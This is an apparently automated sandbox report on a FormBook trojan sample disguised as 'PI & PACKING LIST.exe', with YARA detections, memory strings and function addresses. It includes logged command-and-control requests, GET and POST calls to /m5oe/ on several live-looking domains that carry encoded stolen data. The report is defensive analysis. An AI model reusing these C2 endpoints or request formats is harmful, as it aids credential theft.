Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.como
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 71M40-2OQ.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 71M40-2OQ.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 71M40-2OQ.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 71M40-2OQ.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: control.exe, 0000000D.00000002.517422506.0000000005BFE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY
Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 37 5f 73 34 4d 6c 67 48 78 4f 42 34 6c 5a 30 4e 6d 37 6a 72 4b 34 71 4a 48 45 36 63 78 34 47 33 69 4b 64 52 45 70 44 54 28 78 50 6f 66 61 6c 57 61 75 43 6f 4f 58 48 42 65 69 37 48 45 36 30 67 44 4e 41 6d 31 4e 78 32 58 61 34 63 63 64 77 33 43 64 48 61 77 6f 54 35 43 47 7a 5a 51 78 56 49 38 46 71 5f 34 76 6c 57 6d 62 35 36 6d 71 48 6c 74 70 66 6d 69 58 72 36 56 31 70 6b 4d 41 48 77 4f 70 6f 51 6f 61 63 61 72 33 77 6a 4a 64 4a 56 41 33 32 5a 47 32 67 6b 6f 6f 34 49 4c 69 28 49 37 32 43 45 5a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
Source: unknown DNS traffic detected: queries for: www.gebouwpas.online
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.zkjk888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.cpitherapy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.p-soils.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.bengalindex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.nu2uresale.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: PI & PACKING LIST.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_00B2ADBC 0_2_00B2ADBC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_00B2D478 0_2_00B2D478
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_00B2D46A 0_2_00B2D46A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_04A39F68 0_2_04A39F68
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E0037 0_2_083E0037
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E0033 0_2_083E0033
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E0040 0_2_083E0040
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E9248 0_2_083E9248
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123F900 2_2_0123F900
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130E824 2_2_0130E824
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1002 2_2_012F1002
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013020A8 2_2_013020A8
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B090 2_2_0124B090
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013028EC 2_2_013028EC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01302B28 2_2_01302B28
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012DCB4F 2_2_012DCB4F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125AB40 2_2_0125AB40
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126EBB0 2_2_0126EBB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F03DA 2_2_012F03DA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FDBD2 2_2_012FDBD2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126ABD8 2_2_0126ABD8
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EFA2B 2_2_012EFA2B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013022AE 2_2_013022AE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01230D20 2_2_01230D20
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01302D07 2_2_01302D07
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01301D55 2_2_01301D55
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124D5E0 2_2_0124D5E0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013025DD 2_2_013025DD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124841F 2_2_0124841F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FD466 2_2_012FD466
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01301FF1 2_2_01301FF1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130DFCE 2_2_0130DFCE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01256E30 2_2_01256E30
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FD616 2_2_012FD616
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01302EF7 2_2_01302EF7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004012AA 2_2_004012AA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004211BD 2_2_004211BD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004223D6 2_2_004223D6
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00422B89 2_2_00422B89
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0040B457 2_2_0040B457
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004044C7 2_2_004044C7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004044BE 2_2_004044BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004046E7 2_2_004046E7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0040FE87 2_2_0040FE87
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: String function: 0123B150 appears 136 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01279910
